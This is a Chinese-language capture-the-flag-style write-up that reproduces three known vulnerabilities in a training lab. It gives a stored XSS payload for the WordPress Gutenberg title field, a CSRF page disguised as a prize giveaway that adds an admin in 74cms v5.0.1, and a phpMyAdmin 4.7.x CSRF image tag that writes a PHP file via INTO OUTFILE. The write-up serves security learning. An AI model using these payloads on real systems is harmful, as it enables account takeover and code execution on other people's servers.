漏洞复现靶场wirteup之一

以下复现均在封神台内的靶场中完成，欢迎各位小伙伴前去玩耍。

0x00 WordPress Gutenberg编辑器存储型XSS漏洞

进入到wp的后台页面

选择add new板块，可见在编辑器的Add Title中，后台未对用户输入进行妥善的过滤或者正确转码，导致看到文章的用户都受到恶意代码的影响。

payload：

"><img src=1 onerror=alert("xss")>

复现过程：

点击右上角”Publish”发布后，进入博客主页，出现弹窗：

进一步的利用此处不详述。

0x01 74cms v5.0.1 CSRF 漏洞复现

打开页面

访问构造好的恶意页面：

点击领取后，新管理员被添加。

使用新管理员登陆，可见能够成功登陆：

poc（需手动修改靶场域名）：

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>恭喜你中奖啦</title>
</head>
　　<body>
    <center> <img src="http://5b0988e595225.cdn.sohucs.com/images/20181224/19d726af92e848b69690d786a5390f66.jpeg"/></center>
    　　　　<form action="此处为靶场域名?m=admin&c=admin&a=add" method="POST" id="transfer" name="transfer">
　　　　　　　　<input type="hidden" name="username" value="test">
　　　　　　　　<input type="hidden" name="email" value="test@test.com">
　　　　　　　　<input type="hidden" name="password" value="passwd">
　　　　　　　　<input type="hidden" name="repassword" value="passwd">
　　　　　　　　<input type="hidden" name="role_id" value="1">
　　　　　　　　<input type="hidden" name="submit3" value="添加">
        <center><button type="submit" value="Submit">进入领取</button></center>
　　　　　　</form>
　　</body>
</html>

0x02 phpMyAdmin 4.7.x CSRF 复现

此实验最好使用火狐浏览器进行复现，因为Chrome自带站点隔离的安全机制，对该漏洞复现有一定的影响。

进入phpmyadmin管理页面，需登录

该版本pma存在CSRF漏洞，攻击者可以通过诱导管理员访问恶意页面，悄无声息地执行任意SQL语句。因为我们扮演的便是管理员角色，所以直接访问本地构造好的恶意页面（下方给出POC）：

根据我们在poc中设定好的文件写入位置（目前只赋权给了poc中地址），访问php文件：

可见成功运行了恶意代码，写入了测试文件。

poc：

<p>Hello World</p>
<img src="此处为pma靶场网址/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/usr/share/nginx/html/[自定义名称，谨防重复].php';" style="display:none;" />